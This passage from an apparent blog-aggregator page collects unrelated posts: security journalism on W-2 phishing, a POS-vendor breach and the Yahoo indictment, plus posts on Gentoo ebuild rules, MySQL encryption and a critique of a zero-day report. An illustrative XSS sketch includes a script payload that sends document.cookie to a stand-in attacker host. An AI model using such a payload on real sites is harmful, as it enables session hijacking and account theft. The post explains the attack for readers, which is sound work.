Fraudsters who perpetrate tax refund fraud prize W-2 information because it contains virtually all of the data one would need to fraudulently file someone’s taxes and request a large refund in their name. Scammers in tax years past also have massively phished online payroll management account credentials used by corporate HR professionals. This year, they are going after people who run tax preparation firms, and W-2’s are now being openly sold in underground cybercrime stores.

Tax refund fraud affects hundreds of thousands, if not millions, of U.S. citizens annually. Victims usually first learn of the crime after having their returns rejected because scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

ANALYSIS

I find it interesting that a company which obviously handles extremely sensitive data on a regular basis and one that manages a highly politicized government agency would not anticipate such attacks and deploy some kind of data-loss prevention (DLP) technology to stop sensitive information from leaving their networks.

Thanks to its mandate as an agency, ICE is likely a high-risk target for hacktivists and nation-state hackers. This was not a breach in which data was exfiltrated through stealthy means; the tax data was sent by an employee openly through email. This suggests that either there were no DLP technical controls active in their email environment, or they were inadequately configured to prevent information in SSN format from leaving the network.
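For illustration only (the DLP stack at Defense Point, if any, is unknown, and real products use far richer detection), even a crude outbound-mail filter can flag SSN-formatted strings before they leave the network:

```python
import re

# A deliberately crude rule: three digits, two digits, four digits,
# separated by hyphens, as in a U.S. Social Security Number.
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def contains_ssn(text: str) -> bool:
    """Flag outgoing text that appears to contain an SSN-formatted string."""
    return bool(SSN_RE.search(text))

print(contains_ssn("W-2 attached for J. Doe, SSN 078-05-1120"))  # flagged
print(contains_ssn("Re: invoice 2016-01, order #4411"))          # not flagged
```

A rule this naive would produce false positives and miss unformatted nine-digit numbers; the point is simply that a W-2 dump emailed in the clear is about the easiest pattern a DLP control could be asked to catch.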

This incident also suggests that perhaps Defense Point does not train their employees adequately in information security, and yet they are trusted to maintain the security environment for a major government agency. This from a company that sells cybersecurity education and training as a service to others.

DON’T BE THE NEXT VICTIM

While there isn’t a great deal you can do to stop someone at your employer from falling for one of these W-2 phishing scams, here are some steps you can take to make it less likely that you will be the next victim of tax refund fraud:

-File before the fraudsters do it for you – Your primary defense against becoming the next victim is to file your taxes at the state and federal level as quickly as possible. Remember, it doesn’t matter whether or not the IRS owes you money: Thieves can still try to impersonate you and claim that they do, leaving you to sort out the mess with the IRS later.

-Get on a schedule to request a free copy of your credit report. By law, consumers are entitled to a free copy of their report from each of the major bureaus once a year. Put it on your calendar to request a copy of your file every three to four months, each time from a different credit bureau. Dispute any unauthorized or suspicious activity. This is where credit monitoring services are useful: Part of their service is to help you sort this out with the credit bureaus, so if you’re signed up for credit monitoring make them do the hard work for you.

-File form 14039 and request an IP PIN from the government. This form requires consumers to state they believe they’re likely to be victims of identity fraud. Even if thieves haven’t tried to file your taxes for you yet, virtually all Americans have been touched by incidents that could lead to ID theft — even if we just look at breaches announced in the past year alone.

Consider placing a “security freeze” on one’s credit files with the major credit bureaus. See this tutorial about why a security freeze — also known as a “credit freeze” — may be more effective than credit monitoring in blocking ID thieves from assuming your identity to open up new lines of credit. While it’s true that having a security freeze on your credit file won’t stop thieves from committing tax refund fraud in your name, it would stop them from fraudulently obtaining your IP PIN.

Monitor, then freeze. Take advantage of any free credit monitoring available to you, and then freeze your credit file with the four major bureaus. Instructions for doing that are here.
Top

Why you can’t rely on repository format (PMS)

Postby Michał Górny via Michał Górny »

You should know already that you are not supposed to rely on Portage internals in ebuilds — that is, on any variables, functions and helpers not defined by the PMS. You probably know that you are not supposed to touch various configuration files, the vdb and other Portage files as well. What most people don’t seem to understand is that you are not supposed to make any assumptions about the ebuild repository either. In this post, I will expand on this and try to explain why.



What PMS specifies, what you can rely on

I think the first confusing point is that PMS actually defines the repository format pretty thoroughly. However, it does not specify that you can rely on that format being visible from within ebuild environment. It just defines a few interfaces that you can reliably use, some of them in fact quite consistent with the repository layout.

You should really look at the PMS-defined repository format as an input specification. This is the format that developers are supposed to use when writing ebuilds, and that all basic tools are supposed to support. However, it does not prevent package managers from defining and using other package formats, as long as they provide an environment compliant with the PMS.

In fact, this is how binary packages are implemented in Gentoo. The PMS does not define any specific format for them. It only defines a few basic rules and facilities, and both Portage and Paludis implement their own binary package formats. The package managers expose APIs required by the PMS, and can use them to run the necessary pkg_* phases.

However, the problem is not limited to the two binary package formats currently in use. The generic goal is to be able to define any new package format in the future and have it work out of the box with existing ebuilds. Imagine just a few possibilities: more compact repository formats (e.g. not requiring hundreds of unpacked files), fetching only the needed ebuild files…

Sadly, none of this can even start being implemented if developers continuously insist on relying on a specific repository layout.

The *DIR variables

Let’s get into the details and iterate over the few relevant variables here.

First of all, FILESDIR. This is the directory where ebuild support files are provided throughout src_* phases. However, there is no guarantee that this will be exactly the directory you created in the ebuild repository. The package manager just needs to provide the files in some directory, and this directory may not actually exist before the first src_* phase. This implies that the support files may not even exist at all when installing from a binary package, and may be created (copied, unpacked) later when doing a source build.
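As an illustrative sketch (hypothetical package, patch and file names), the practical rule boils down to which phases may touch FILESDIR at all:

```bash
# Illustrative ebuild fragment, not a complete ebuild.

src_prepare() {
	# Fine: FILESDIR is guaranteed to be populated during src_* phases.
	eapply "${FILESDIR}/${PN}-respect-cflags.patch"
	default
}

pkg_postinst() {
	# Wrong: FILESDIR may not exist here at all -- for example when
	# installing from a binary package, no support files need be present.
	#cp "${FILESDIR}/example.conf" ...  # do not do this in pkg_* phases
	elog "An example config is installed in /usr/share/doc/${PF}."
}
```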

The next variable listed by the PMS is DISTDIR. While this variable is somewhat similar to the previous one, some developers are actually eager to make the opposite assumption. Once again, the package manager may provide the path to any directory that contains the downloaded files. This may be a ‘shadow’ directory containing only files for this package, or it can be any system downloads directory containing lots of other files. Once again, you can’t assume that DISTDIR will exist before src_*, and that it will exist at all (and contain necessary files) when the build is performed using a binary package.

The two remaining variables I would like to discuss are PORTDIR and ECLASSDIR. Those two are a cause of real mayhem: they are completely unsuited for a multi-repository layout modern package managers use and they enforce a particular source repository layout (they are not available outside src_* phases). They pretty much block any effort on improvement, and sadly their removal is continuously blocked by a few short-sighted developers. Nevertheless, work on removing them is in progress.

Environment saving

While we’re discussing those matters, a short note on environment saving is in order. By environment saving we usually mean the magic that causes variables set in one phase function to be carried over to a following phase function, possibly across a disjoint sequence of actions (e.g. install followed by uninstall).

A common misunderstanding is to assume the Portage model of environment saving — i.e. basically dumping the whole ebuild environment, including functions, into a file. However, this is not sanctioned by the PMS. The rules require the package manager to save only variables, and only those that are not defined in global scope. If phase functions define functions, there is no guarantee that those functions will be preserved or restored. If phases redefine global variables, there is no guarantee that the redefinition will be preserved.
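A minimal sketch of what this means in practice (hypothetical ebuild fragment; the variable and helper names are made up):

```bash
# Illustrative fragment of what the PMS does and does not guarantee.

src_configure() {
	# Saved: a variable set in a phase (not in global scope) is
	# carried over to later phase functions.
	MY_BACKEND="openssl"

	# Not guaranteed: a function defined inside a phase may be gone
	# by the time the next phase runs under a conforming package manager.
	my_helper() { :; }
}

src_compile() {
	einfo "building against ${MY_BACKEND}"   # fine, restored by env saving
	# my_helper                              # may be undefined -- avoid
}
```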

In fact, the specific wording used in the PMS allows a completely different implementation to be used. The package manager may just snapshot defined functions after processing the global scope, or even not snapshot them at all and instead re-read the ebuild (and re-inherit eclasses) every time the execution continues. In this case, any functions defined during a phase function are lost.

Is there a future in this?

I hope this clears up all the misunderstandings on how to write ebuilds so that they will work reliably, both for source and binary builds. If those rules are followed, our users can finally start expecting some fun features to come. However, before that happens we need to fix the few existing violations — and for that to happen, we need a few developers to stop thinking only of their own convenience.
Top

Electric delivery truck

Postby kris via The Isoblog. »

Amsterdam: Electric delivery truck
Top

Post.nl: Electric delivery vehicle for packages

Postby kris via The Isoblog. »

Post NL: Electric delivery vehicle
Top

Google Points to Another POS Vendor Breach

Postby BrianKrebs via Krebs on Security »

For the second time in the past nine months, Google has inadvertently but nonetheless correctly helped to identify the source of a large credit card breach — by assigning a “This site may be hacked” warning beneath the search results for the Web site of a victimized merchant.

A little over a month ago, KrebsOnSecurity was contacted by multiple financial institutions whose anti-fraud teams were trying to trace the source of a great deal of fraud on cards that were all used at a handful of high-end restaurants around the country.

Two of those fraud teams shared a list of restaurants that all affected cardholders had visited recently. A bit of searching online showed that nearly all of those establishments were run by Select Restaurants Inc., a Cleveland, Ohio company that owns a number of well-known eateries nationwide, including Boston’s Top of the Hub; Parker’s Lighthouse in Long Beach, Calif.; the Rusty Scupper in Baltimore, Md.; Parkers Blue Ash Tavern in Cincinnati, Ohio; Parkers’ Restaurant & Bar in Downers Grove, Illinois; Winberie’s Restaurant & Bar with locations in Oak Park, Illinois and Princeton and Summit, New Jersey; and Black Powder Tavern in Valley Forge, PA.

Google’s search listing for Select Restaurants, which indicates Google thinks this site may be hacked.
Knowing very little about this company at the time, I ran a Google search for it and noticed that Google believes the site may be hacked (it still carries this message). This generally means some portion of the site was compromised by scammers who are trying to abuse the site’s search engine rankings to beef up the rankings for “spammy” sites — such as those peddling counterfeit prescription drugs and designer handbags.

The “This site may be hacked” advisory is not quite as dire as Google’s “This site may harm your computer” warning — the latter usually means the site is actively trying to foist malware on the visitor’s computer. But in my experience it’s never a good sign when a business that accepts credit cards has one of these warnings attached to its search engine results.

Case in point: I experienced this exact scenario last summer as I was reporting out the details on the breach at the CiCi’s Pizza chain. In researching that story, all signs were pointing to a point-of-sale (POS) terminal provider called Datapoint POS. Just like it did with Select Restaurants’ site, Google reported that Datapoint’s site appeared to be hacked.

Google believed Datapoint’s Web site was hacked.
Select Restaurants did not return messages seeking comment. But as with the breach at Cici’s Pizza chains, the breach involving Select Restaurant locations mentioned above appears to have been the result of an intrusion at the company’s POS vendor — Geneva, Ill. based 24×7 Hospitality Technology. 24×7 handles credit and debit card transactions for thousands of hotels and restaurants.

On Feb. 14, 24×7 Hospitality sent a letter to customers warning that its systems recently were hacked by a “sophisticated network intrusion through a remote access application.” Translation: Someone guessed or phished the password it used to remotely administer point-of-sale systems at its customer locations. 24×7 said the attackers subsequently executed the PoSeidon malware variant, which is designed to siphon card data when cashiers swipe credit cards at an infected cash register (for more on PoSeidon, check out POS Providers Feel Brunt of PoSeidon Malware).

KrebsOnSecurity obtained a copy of the letter (PDF) that 24×7 Hospitality CEO Todd Baker, Jr. sent to Select Restaurants. That missive said even though the intruders apparently had access to all of 24×7 customers’ payment systems, not all of those systems were logged into by the hackers. Alas, this was probably little consolation for Select Restaurants, because the letter then goes on to say that the breach involves all of the restaurants listed on Select’s Web site, and that the breach appears to have extended from late October 2016 to mid-January 2017.

ANALYSIS

From my perspective, organized crime gangs have so completely overrun the hospitality and restaurant point-of-sale systems here in the United States that I just assume my card may very well be compromised whenever I use it at a restaurant or hotel bar/eatery. I’ve received no fewer than three new credit cards over the past year, and I’d wager that in at least one of those cases I happened to have used the card at multiple merchants whose POS systems were hacked at the same time.

But no matter how many times I see it, it’s fascinating to watch this slow motion train wreck play out. Given how much risk and responsibility for protecting against these types of hacking incidents is spread so thinly across the entire industry, it’s little wonder that organized crime gangs have been picking off POS providers for Tier 3 and Tier 4 merchants with PoSeidon en masse in recent years.

I believe one big reason we keep seeing the restaurant and hospitality industry being taken to the cleaners by credit card thieves is that in virtually all of these incidents, the retailer or restaurant has no direct relationships to the banks which have issued the cards that will be run through their hacked POS systems. Rather, these small Tier 3 and Tier 4 merchants are usually buying merchant services off of a local systems integrator who often is in turn reselling access to a third-party payment processing company.

As a result, very often when these small chains or solitary restaurants get hit with PoSeidon, there is no record of a breach that is simple to follow from the breached merchant back to the bank which issued the cards used at those compromised merchants. It is only by numerous financial institutions experiencing fraud from the same restaurants and then comparing notes about possible POS vendors in common among these restaurants that banks and credit unions start to gain a clue about what’s happening and who exactly has been hacked.

But this takes a great deal of time, effort and trust. Meanwhile, the crooks are laughing all the way to the bank. Another reason I find all this fascinating is that the two main underground cybercrime shops that appear to be principally responsible for offloading cards stolen in these Tier 3 and Tier 4 merchant breaches involving PoSeidon — stores like Rescator and Briansdump — both abuse my likeness in their advertisements and on their home pages. Here’s Briansdump:

An advertisement for the carding shop “briansdump[dot]ru” promotes “dumps from the legendary Brian Krebs.” Needless to say, this is not an endorsed site.
Here’s the login page for the rather large stolen credit card bazaar known as Rescator:
The login page for Rescator, a major seller of credit and debit cards stolen in countless attacks targeting retailers, restaurants and hotels.
Point-of-sale malware has driven most of the major retail industry credit card breaches over the past two years, including intrusions at Target and Home Depot, as well as breaches at a ridiculous number of point-of-sale vendors. The malware sometimes is installed via hacked remote administration tools like LogMeIn; in other cases the malware is relayed via “spear-phishing” attacks that target company employees. Once the attackers have their malware loaded onto the point-of-sale devices, they can remotely capture data from each card swiped at that cash register.

Thieves can then sell that data to crooks who specialize in encoding the stolen data onto any card with a magnetic stripe, and using the cards to purchase high-priced electronics and gift cards from big-box stores like Target and Best Buy.

Readers should remember that they’re not liable for fraudulent charges on their credit or debit cards, but they still have to report the unauthorized transactions. There is no substitute for keeping a close eye on your card statements. Also, consider using credit cards instead of debit cards; having your checking account emptied of cash while your bank sorts out the situation can be a hassle and lead to secondary problems (bounced checks, for instance).

Finally, if your credit card is compromised, try not to lose sleep over it: The chances of your finding out how that card was compromised are extremely low. This story seeks to explain why.

Update: March 18, 2:52 p.m. ET: An earlier version of this story referenced Buffalo Wild Wings as a customer of 24×7 Hospitality, as stated on 24×7’s site in many places (PDF). Buffalo Wild Wings wrote in to say that it does not use the specific POS systems that were attacked, and that it is asking 24×7 to remove their brand and logo from the site.

Top

Netways OSDC 2017: Something Openshift Kubernetes Containers

Postby kris via The Isoblog. »

OSDC 2017 Registration
I will be speaking at the Netways Open Source Data Center Conference, which is in Berlin between May 16 and 18. At work, we are currently busy loading our first two Kubernetes Clusters (Openshift actually) with workloads.

What exactly will be in the slides I do not know yet, but it will be about our journey at Booking: the transition from automated bare-metal provisioning of rather monolithic applications to a more containerized setup, and the changes and challenges this brings. It will be very much a snapshot of the state of things at that point in time, and of our learnings and perspective then.

Top

Four Men Charged With Hacking 500M Yahoo Accounts

Postby BrianKrebs via Krebs on Security »

“Between two evils, I always pick the one I never tried before.” -Karim Baratov (paraphrasing Mae West)

The U.S. Justice Department today unsealed indictments against four men accused of hacking into a half-billion Yahoo email accounts. Two of the men named in the indictments worked for a unit of the Russian Federal Security Service (FSB) that serves as the FBI’s point of contact in Moscow on cybercrime cases. Here’s a look at the accused, starting with a 22-year-old who apparently did not try to hide his tracks.

According to a press release put out by the Justice Department, among those indicted was Karim Baratov (a.k.a. Kay, Karim Taloverov), a Canadian and Kazakh national who lives in Canada. Baratov is accused of being hired by the two FSB officer defendants in this case — Dmitry Dokuchaev, 33, and Igor Sushchin, 43 — to hack into the email accounts of thousands of individuals.

Karim Baratov (a.k.a. Karim Taloverov), as pictured in 2014 on his own site, mr-karim.com. The license plate on his BMW pictured here is Mr. Karim.
Reading the Justice Department’s indictment, it would seem that Baratov was perhaps the least deeply involved in this alleged conspiracy. That may turn out to be true, but he also appears to have been the least careful about hiding his activities, leaving quite a long trail of email hacking services that took about 10 minutes of searching online to trace back to him specifically.

Security professionals are fond of saying that any system is only as secure as its weakest link. It would not be at all surprising if Baratov was the weakest link in this conspiracy chain.

A look at Mr. Baratov’s Facebook and Instagram photos indicates he is heavily into high-performance sports cars. His profile picture shows two of his prized cars — a Mercedes and an Aston Martin — parked in the driveway of his single-family home in Ontario.

A simple reverse WHOIS search at domaintools.com on the name Karim Baratov turns up 81 domains registered to someone by this name in Ontario. Many of those domains include the names of big email providers like Google and Yandex, such as accounts-google[dot]net and www-yandex[dot]com.

Other domains appear to be Web sites selling email hacking services. One of those is a domain registered to Baratov’s home address in Ancaster, Ontario called infotech-team[dot]com. A cached copy of that site from archive.org shows this once was a service that offered “quality mail hacking to order, without changing the password.” The service charged roughly $60 per password.

Archive.org’s cache of infotech-team.com, an email hacking service registered to Baratov.
The proprietors of Infotech-team[dot]com advertise the ability to steal email account passwords without actually changing the victim’s password. According to the Justice Department, Baratov’s service relied on “spear phishing” emails that targeted individuals with custom content and enticed the recipient into clicking a link.

Antimail[dot]org is another domain registered to Baratov that was active between 2013 and 2015. It advertises “quality-mail hacking to order!”:



Another email hacking business registered to Baratov is xssmail[dot]com, which also has for several years advertised the ability to break into email accounts of virtually all of the major Webmail providers. XSS is short for “cross-site scripting.” XSS attacks rely on vulnerabilities in Web sites that don’t properly sanitize data submitted by visitors in search forms or anyplace else one might enter data on a Web site.

In the context of phishing links, the user clicks the link and is actually taken to the legitimate domain he or she thinks they are visiting (e.g., yahoo.com), but the vulnerability allows the attacker to inject malicious code into the page the victim is viewing.

This can include fake login prompts that send any data the victim submits directly to the attacker. Alternatively, it could allow the attacker to steal “cookies,” text files that many sites place on visitors’ computers to validate whether they have visited the site previously, as well as if they have authenticated to the site already.
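The fake-login variant can be illustrated with a toy sketch: a page template that reflects a URL parameter back into the HTML. The template, payload and attacker hostname below are made up for illustration, not taken from the indictment; the only point is that escaping decides whether the injected script runs.

```python
import html

# Toy page template; 'escape' toggles the vulnerability on and off.
def render_results(query: str, escape: bool = True) -> str:
    shown = html.escape(query) if escape else query
    return f"<p>Results for: {shown}</p>"

# A phishing link would carry something like this in a URL parameter:
payload = '<script>new Image().src="//attacker.example/?c="+document.cookie</script>'

unsafe_page = render_results(payload, escape=False)  # script survives and runs on the trusted origin
safe_page = render_results(payload)                  # rendered as inert text
```

Because the script executes on the trusted site's own origin, it can read that site's cookies, which is exactly what makes XSS useful for account takeover.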

Archive.org’s cache of xssmail.com
Perhaps instead of, or in addition to, using XSS attacks in targeted phishing emails, Baratov also knew about or had access to other cookie-stealing exploits collected by another man accused in today’s indictments: Russian national Alexsey Alexseyevich Belan.

According to government investigators, Belan has been on the FBI’s Cyber Most Wanted list since 2013 after breaking into and stealing credit card data from a number of e-commerce companies. In June 2013, Belan was arrested in a European country on request from the United States, but the FBI says he was able to escape to Russia before he could be extradited to the U.S.

A screenshot from the FBI’s Cyber Most Wanted List for Alexsey Belan.
The government says the two other Russian nationals who were allegedly part of the conspiracy to hack Yahoo — the aforementioned FSB Officers Dokuchaev and Sushchin — used Belan to gain unauthorized access to Yahoo’s network. Here’s what happened next, according to the indictments:

“In or around November and December 2014, Belan stole a copy of at least a portion of Yahoo’s User Database (UDB), a Yahoo trade secret that contained, among other data, subscriber information including users’ names, recovery email accounts, phone numbers and certain information required to manually create, or ‘mint,’ account authentication web browser ‘cookies’ for more than 500 million Yahoo accounts.

“Belan also obtained unauthorized access on behalf of the FSB conspirators to Yahoo’s Account Management Tool (AMT), which was a proprietary means by which Yahoo made and logged changes to user accounts. Belan, Dokuchaev and Sushchin then used the stolen UDB copy and AMT access to locate Yahoo email accounts of interest and to mint cookies for those accounts, enabling the co-conspirators to access at least 6,500 such accounts without authorization.”
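Why database and tool access is enough to "mint" cookies can be sketched with a deliberately simplified model: if an authentication cookie is just an account identifier plus a keyed MAC, then anyone holding the server-side secret (or a tool that applies it) can forge a cookie the server will accept. The scheme, key and names below are illustrative assumptions, not Yahoo's actual cookie design.

```python
import hashlib
import hmac

# Entirely hypothetical scheme: cookie = account name plus an HMAC over it.
SIGNING_KEY = b"server-side-secret"   # what minting ultimately depends on

def mint_cookie(account: str, key: bytes) -> str:
    tag = hmac.new(key, account.encode(), hashlib.sha256).hexdigest()
    return f"{account}|{tag}"

def server_accepts(cookie: str, key: bytes) -> bool:
    account, _, tag = cookie.partition("|")
    good = hmac.new(key, account.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, good)

# With the key, a cookie can be minted for any account of interest, and the
# server accepts it without a password ever being entered:
forged = mint_cookie("victim@example.com", SIGNING_KEY)
```

This is why forged cookies let the conspirators into accounts "without authorization": from the server's point of view, a correctly minted cookie is indistinguishable from one issued after a real login.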

U.S. investigators say Dokuchaev was an FSB officer assigned to Second Division of FSB Center 18, also known as the FSB Center for Information Security. Dokuchaev’s colleague Sushchin was an FSB officer and embedded as a purported employee and Head of Information Security at a Russian financial firm, where he monitored the communications of the firm’s employees.



According to the Justice Department, some victim accounts that Dokuchaev and Sushchin asked Belan and Baratov to hack were of predictable interest to the FSB (a foreign intelligence and law enforcement service), such as personal accounts belonging to Russian journalists; Russian and U.S. government officials; employees of a prominent Russian cybersecurity company; and numerous employees of other providers whose networks the conspirators sought to exploit. Other personal accounts belonged to employees of commercial entities, such as a Russian investment banking firm, a French transportation company, U.S. financial services and private equity firms, a Swiss bitcoin wallet and banking firm and a U.S. airline.

“During the conspiracy, the FSB officers facilitated Belan’s other criminal activities, by providing him with sensitive FSB law enforcement and intelligence information that would have helped him avoid detection by U.S. and other law enforcement agencies outside Russia, including information regarding FSB investigations of computer hacking and FSB techniques for identifying criminal hackers,” the Justice Department charged in its press statement about the indictments.

“Additionally, while working with his FSB conspirators to compromise Yahoo’s network and its users, Belan used his access to steal financial information such as gift card and credit card numbers from webmail accounts; to gain access to more than 30 million accounts whose contacts were then stolen to facilitate a spam campaign; and to earn commissions from fraudulently redirecting a subset of Yahoo’s search engine traffic,” the government alleges.



Each of the four men faces 47 criminal charges, including conspiracy, computer fraud, economic espionage, theft of trade secrets and aggravated identity theft.

Dokuchaev, who is alleged to have used the hacker nickname “Forb,” was arrested in December in Moscow. According to a report by the Russian news agency Interfax, Dokuchaev was arrested on charges of treason for allegedly sharing information with the U.S. Central Intelligence Agency (CIA). For more on that treason case, see my Jan. 28, 2017 story, A Shakeup in Russia’s Top Cybercrime Unit.

For more on Dokuchaev’s allegedly checkered past (Russian news sites report that he went to work for the FSB to avoid being prosecuted for bank fraud) check out this fascinating story from Russian news outlet Vedomosti, which featured an interview with the hacker Forb from 2004.

In September 2016, Yahoo first disclosed the theft of 500 million accounts that is being attributed to this conspiracy. But in December 2016, Yahoo acknowledged a separate hack from 2013 had jeopardized more than a billion user accounts.

The New York Times reports that Yahoo said it has not been able to glean much information about that attack, which was uncovered by InfoArmor, an Arizona security firm. Interestingly, that attack also involved the use of forged Yahoo cookies, according to a statement from Yahoo’s chief information security officer.

The one alleged member of this conspiracy who would have been simple to catch is Baratov, as he does not appear to have hidden his wealth and practically peppers the Internet with pictures of six-figure sports cars he has owned over the years.

Baratov was arrested on Tuesday in Canada, where the matter is now pending with Canadian authorities. U.S. prosecutors are now trying to seize Baratov’s black Mercedes Benz C54 and his Aston Martin DBS, arguing that they were purchased with the proceeds from cybercrime activity.

A redacted copy of the indictment is available here.

Update, Mar. 16, 5:20 p.m. ET: A previous caption on one of the above photos misidentified the make and model of a car. Also, an earlier version of this story incorrectly stated that Yahoo had attributed its 2013 breach to a state-sponsored actor; the company says it has not yet attributed that intrusion to any one particular actor.
Top

The secret of on-time trains!

Postby kris via The Isoblog. »

German Rail, notoriously late, can maybe learn a thing from NS, according to this article, because they have cracked the secret to avoiding late trains:

Smartwatches for platform personnel.

Okay, I can see the value:

Met de app kunnen de conducteurs op het horloge de actuele vertrekinfo zien. Vlak voor het moment dat de trein moet vertrekken, trilt het horloge. Daardoor weet de conducteur dat hij in actie moet komen en moet kijken of iedereen is ingestapt. Volgens ProRail scheelt dat seconden en in sommige gevallen minuten.

(Using the app, the conductors can see the current departure information on the watch. Just before the train is due to depart, the watch vibrates. That way the conductor knows he has to get moving and check whether everyone has boarded. According to ProRail this saves seconds, and in some cases minutes.)

Still the entire presentation might be somewhat overenthusiastic… 🙂
Top

MySQL and encrypted connections

Postby kris via The Isoblog. »

2006 slides by Rasmus Lerdorf
Since 5.0, MySQL has natively supported encrypted connections to the database, and supposedly also supports client certificates for user authentication. Supposedly, because I never tried.

MySQL as a database performs well with transient connections, as they are prevalent in two-tier deployments (mod_php, mod_perl, mod_python talking to the database), in which a database connection is made upon each web request and torn down at the end of the request. This model does not scale so well with encryption in the mix, because a full TLS/SSL handshake must be performed on every connection.

The talk given by Rasmus Lerdorf starts out with Postgres, and then switches to MySQL, but the big gain at the beginning is really from dropping the TLS/SSL connection establishment overhead, not from anything else. It would be the same, no matter what database is doing the work behind that channel.
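A back-of-envelope calculation shows why the handshake dominates for short-lived connections. All numbers below are illustrative assumptions, not measurements from the talk:

```python
# Back-of-envelope cost of transient database connections with TLS in the mix.
# All numbers are illustrative assumptions, not measurements.
rtt_ms = 1.0          # assumed round-trip time between web and database tier
tls_round_trips = 2   # a classic full TLS handshake costs roughly 2 extra RTTs
query_ms = 0.5        # assumed time for the actual query work

# mod_php style: connect (with handshake) and tear down on every request
per_request_transient = tls_round_trips * rtt_ms + query_ms

# persistent/pooled connection (or a VPN tunnel): handshake paid once, amortized away
per_request_pooled = query_ms

overhead_pct = 100 * (per_request_transient - per_request_pooled) / per_request_transient
```

Under these assumed numbers the handshake accounts for 80% of per-request time, which is why amortizing it (pooling, persistent connections, or a long-lived tunnel) is the real win, regardless of which database sits behind the channel.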

For customers who had the need of talking to the database on a secure channel, I always recommended a VPN tunnel such as IPsec, openvpn or similar, and then connecting in clear through it. This not only avoids connection establishment/teardown overhead, but also secures all other administrative communication to the server that will happen, but typically does not use the MySQL protocol (such as backups, bulk downloads of dumps and other traffic).

Daniël van Eeden has been less lazy than me:

In conversation with Daniël I learned a few more things. For example, I always thought that community MySQL is linked against OpenSSL, and Enterprise MySQL uses YaSSL for license reasons, but that is a) wrong and b) a problem.

It is wrong, because apparently OpenSSL uses its own little license, and that one appears to be GPL-incompatible (like just about any license that is not the GPL itself).

It’s yaSSL that’s GPL. But – yaSSL is dying, and the replacement product is WolfSSL, which is also GPL’ed, but not used by MySQL, yet.

OTOH, Daniël pointed out that current versions of xtrabackup seem to be linked against OpenSSL, which would have to be changed (or the license situation cleared up otherwise).

So – it’s complicated already at the organisational and licensing level, before you even start to dive into the tech specifics.

Anyway, Daniël is planning more articles about MySQL and encryption in his blog, so if you aren’t subscribed, do it now.
Top

Zero Days and Cargo Cult Science

Postby Hanno Böck via Hanno's blog »

I've complained in the past about the lack of rigorous science in large parts of IT security. However there's no lack of reports and publications that claim to provide data about this space.

Recently RAND Corporation, a US-based think tank, published a report about zero day vulnerabilities. Many people praised it; an article on Motherboard quotes people saying that we finally have “cold hard data”, among them people from the zero day business who came to the conclusion that this report clearly confirms what they already believed.

I read the report. I wasn't very impressed. The data is so weak that I think the conclusions are almost entirely meaningless.

The story that is spun around this report needs some context: There's a market for secret security vulnerabilities, often called zero days or 0days. These are vulnerabilities in IT products that some actors (government entities, criminals or just hackers who privately collect them) don't share with the vendor of that product or the public, so the vendor doesn't know about them and can't provide a fix.

One potential problem of this are bug collisions. Actor A may find or buy a security bug and choose to not disclose it and use it for its own purposes. If actor B finds the same bug then he might use it to attack actor A or attack someone else. If A had disclosed that bug to the vendor of the software it could've been fixed and B couldn't have used it, at least not against people who regularly update their software. Depending on who A and B are (more or less democratic nation states, nation states in conflict with each other or simply criminals) one can argue how problematic that is.

One question that arises here is how common that is. If you found a bug – how likely is it that someone else will find the same bug? The argument goes that if this rate is low then stockpiling vulnerabilities is less problematic. This is how the RAND report is framed. It tries to answer that question and comes to the conclusion that bug collisions are relatively rare. Thus many people now use it to justify that zero day stockpiling isn't so bad.

The data is hardly trustworthy

The basis of the whole report is an analysis of 207 bugs by an entity that shared this data with the authors of the report. The report is incredibly vague about that source, referring to it only by the pseudonym BUSBY.

We can learn that it's a company in the zero day business and indirectly we can learn how many people work there on exploit development. Furthermore we learn: “Some BUSBY researchers have worked for nation-states (so their skill level and methodology rival that of nation-state teams), and many of BUSBY’s products are used by nation-states.” That's about it. To summarize: We don't know where the data came from.

The authors of the study believe that this is a representative data set. But it is not really explained why they believe so. There are numerous problems with this data:
  • We don't know in which way this data has been filtered. The report states that 20-30 bugs “were removed due to operational sensitivity”. How was that done? Based on what criteria? They won't tell you. Were the 207 bugs plus the 20-30 bugs all the bugs the company had found or was this already pre-filtered? They won't tell you.
  • It is plausible to assume that a certain company focuses on specific bugs, has certain skills, tools or methods that all can affect the selection of bugs and create biases.
  • Oh by the way, did you expect to see the data? Like a table of all the bugs analyzed, with at least the little pieces of information BUSBY was willing to share? Because you were promised cold hard data? Of course not. That would mean others could reanalyze the data, and that would be unfortunate. The only thing you get are charts and tables summarizing the data.
  • We don't know the conditions under which this data was shared. Did BUSBY have any influence on the report? Were they allowed to read it and comment on it before publication? Did they have veto rights to the publication? The report doesn't tell us.

Naturally BUSBY has an interest in a certain outcome and interpretation of that data. This creates a huge conflict of interest. It is entirely possible that they only chose to share that data because they expected a certain outcome. And obviously the reverse is also true: Other companies may have decided not to share such data to avoid a certain outcome. It creates an ideal setup for publication bias, where only the data supporting a certain outcome is shared.

It is inexcusable that the problem of conflict of interest isn't even mentioned or discussed anywhere in the whole report.

A main outcome is based on a very dubious assumption

The report emphasizes two main findings. One is that the lifetime of a vulnerability is roughly seven years. With the caveat that the data is likely biased, this claim can be derived from the data available. It can reasonably be claimed that this lifetime estimate is true for the 207 analyzed bugs.

The second claim is about the bug collision rate and is much more problematic:
“For a given stockpile of zero-day vulnerabilities, after a year, approximately 5.7 percent have been discovered by an outside entity.”

Now think about this for a moment. It is absolutely impossible to know that based on the data available. This would only be possible if they had access to all the zero days discovered by all actors in that space in a certain time frame. It might be possible to extrapolate this if you knew how many bugs there are in total on the market, but you don't.
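How much the answer depends on that unknown total can be made concrete with a toy Monte Carlo simulation: the same two actors, each finding the same number of bugs, produce collision rates differing by orders of magnitude depending on how big the overall bug pool is. Every number here is made up for illustration.

```python
import random

def collision_rate(pool_size, found_blue, found_red, trials=2000, seed=42):
    """Average fraction of Blue's bugs independently rediscovered by Red,
    assuming both draw uniformly from the same finite pool of bugs."""
    rng = random.Random(seed)
    total = 0.0
    for _ in range(trials):
        blue = set(rng.sample(range(pool_size), found_blue))
        red = set(rng.sample(range(pool_size), found_red))
        total += len(blue & red) / found_blue
    return total / trials

# Same Blue stockpile (200 bugs) and same Red effort (200 bugs), but the
# collision rate swings with the unknown pool size:
small_pool = collision_rate(1_000, 200, 200)    # expected overlap around 20%
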